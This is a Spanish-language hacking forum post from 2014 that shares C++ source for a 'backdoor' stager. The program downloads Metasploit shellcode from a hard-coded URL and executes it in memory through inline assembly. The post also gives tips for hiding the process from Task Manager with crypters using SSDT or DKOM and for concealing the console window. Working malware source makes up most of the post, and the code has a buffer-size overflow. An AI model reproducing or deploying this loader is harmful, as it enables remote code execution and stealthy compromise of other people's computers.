elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Top 20 herramientas Hacking más populares de 2020


+  Foro de elhacker.net
|-+  Programación
| |-+  Programación C/C++ (Moderadores: Eternal Idol, Littlehorse, K-YreX)
| | |-+  C++ Advanced Backdoor
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: C++ Advanced Backdoor  (Leído 1,386 veces)
StevenKhooks

Desconectado Desconectado

Mensajes: 9


Ver Perfil
C++ Advanced Backdoor
« en: 16 Junio 2014, 04:16 am »

Hola a todos les comparto el siguiente video tutorial aqui utilizamos metasploit msfpayload recuerden que donde esta el archivo.bin es el backdoor . ustedes pueden hacerlo con archivos backdoor.exe tambien  :D

//No crea archivos temporales en el sistema
//EL proceso es visto por el administrador de tareas pero se puede ocultar facilmente si lo pasan por un builder o crypter que tenga la opcion SSDT o DKOM para olcultarlo del administrador de tareas y process explorer y muchos mas es la imaginacion







Código:


    //include library wininet this have a funtions InternetOpen(),InternetOpenUrl(),InternetReadFile(),InternetCloseHandle(),
    #include <windows.h>
    #include<iostream>
    #include<cstring>
    #include<Wininet.h>
    using namespace std;
    //this is a buffer with shellcode data in .bss section
    unsigned char DataReceived[500];
    int main(){
        int i;
        //this configure a HTTP agent to surf
      HINTERNET connect = InternetOpen("MyBrowser",INTERNET_OPEN_TYPE_PRECONFIG,NULL, NULL, 0);
        //if for validate connection.
       if(!connect){
          cout<<"Connection Failed or Syntax error";
          return 0;
       }
     //Open a malicious url
    HINTERNET OpenAddress = InternetOpenUrl(connect,"http://192.168.16.2/ascii.bin", NULL, 0, INTERNET_FLAG_PRAGMA_NOCACHE|INTERNET_FLAG_KEEP_CONNECTION, 0);
    
     //this check the handler for URL
       if ( !OpenAddress )
       {
          DWORD ErrorNum = GetLastError();
          cout<<"Failed to open URL \nError No: "<<ErrorNum;
          InternetCloseHandle(connect);
          return 0;
       }
    
    
       DWORD NumberOfBytesRead = 0;
      
       //this recovery a file on server and save data into DataReceived
       while(InternetReadFile(OpenAddress, DataReceived, 4096, &NumberOfBytesRead) && NumberOfBytesRead )
       {
       //this print the data in format \x00 you can delete this routine
       for(i=0;i<sizeof DataReceived; i++ ){
                      
                       printf("\\x%02x",DataReceived[i]);
                        
                        }
       /*this routine is a other implementattion of shellcode-test but in this routine i use  __asm () directive for call asm intrucctions.
       1)first i store a pointer to buffer in EAX register
       2)push eax, Pointer to DataReceived in stack now esp point to first 4 bytes of shellcode
       3)the ret instruction put the value of esp+4 into eip and pass the execution.
       4)finally the shellcode in DataReceived is executed
       5)all handler is closed.
       NOTA:
            you can put a nopsled before shellcode for estabilish execution .
            use freeconsole for hidden a Dos Windows
       */
    __asm ("lea _DataReceived, %eax");
    __asm ("push %eax");
    __asm ("ret");
       }
    
       InternetCloseHandle(OpenAddress);
       InternetCloseHandle(connect);
    
       return 0;
    }



En línea

of Belfort
Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Advanced IM Password Recovery 1.9
Ingeniería Inversa
ReTrO 6 3,854 Último mensaje 27 Julio 2003, 21:24 pm
por ReTrO
Ocultar ip en backdoor
Análisis y Diseño de Malware
retr02332 7 4,711 Último mensaje 6 Septiembre 2020, 13:02 pm
por @XSStringManolo
Backdoor en web
Hacking
beto1555 3 1,493 Último mensaje 30 Noviembre 2020, 23:59 pm
por el-brujo
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines